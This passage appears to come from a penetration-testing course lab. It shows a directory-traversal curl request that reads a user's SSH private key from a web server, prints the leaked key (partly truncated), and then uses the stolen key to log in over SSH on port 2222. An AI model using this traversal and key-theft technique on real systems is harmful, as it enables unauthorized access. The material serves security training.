curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../home/offs ec/.ssh/id_rsa ...
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAz+pEKI1OmULVSs8ojO/sZseiv3zf2dbH6LSyYuj3AHkcxIND7UTw
XdUTtUeeJhbTC0h5S2TWFJ3OGB0zjCqsEI16ZHsaKI9k2CfNmpl0siekm9aQGxASpTiYOs
KCZOFoPU6kBkKyEhfjB82Ea1VoAvx4J4z7sNx1+wydQ/Kf7dawd95QjBuqLH9kQIEjkOGf
BemTOAyCdTBxzUhDz1siP9uyofquA5vhmMXWyy68pLKXpiQqTF+foGQGG90MBXS5hwskYg
...
lpWPWFQro9wzJ/uJsw/lepsqjrg2UvtrkAAADBAN5b6pbAdNmsQYmOIh8XALkNHwSusaK8
bM225OyFIxS+BLieT7iByDK4HwBmdExod29fFPwG/6mXUL2Dcjb6zKJl7AGiyqm5+0Ju5e
hDmrXeGZGg/5unGXiNtsoTJIfVjhM55Q7OUQ9NSklONUOgaTa6dyUYGqaynvUVJ/XxpBrb
iRdp0z8X8E5NZxhHnarkQE2ZHyVTSf89NudDoXiWQXcadkyrIXxLofHPrQzPck2HvWhZVA
+2iMijw3FvY/Fp4QAAAA1vZmZzZWNAb2Zmc2VjAQIDBA==
-----END OPENSSH PRIVATE KEY-----
...
Listing 136 - SSH Private Key via curl Listing 136 shows that the SSH private key is formatted better using curl than in the browser.
Let’s copy the output from the terminal and paste it into a file called dt_key in the home directory
for the
kali user.
Let’s use the private key to connect to the target system via SSH on port 2222. We can use the -i
parameter to specify the stolen private key file and -p to specify the port. Before we can use the
private key, we’ll need to modify the permissions of the dt_key file so that only the user / owner
can read the file; if we don’t, the
ssh program will throw an error stating that the access
permissions are too open.
kali@kali:~$
ssh -i dt_key -p 2222 offsec@mountaindesserts.com The authenticity of host '[mountaindesserts.com]:2222 ([192.168.50.16]:2222)' can't be
established.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
yes ...
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
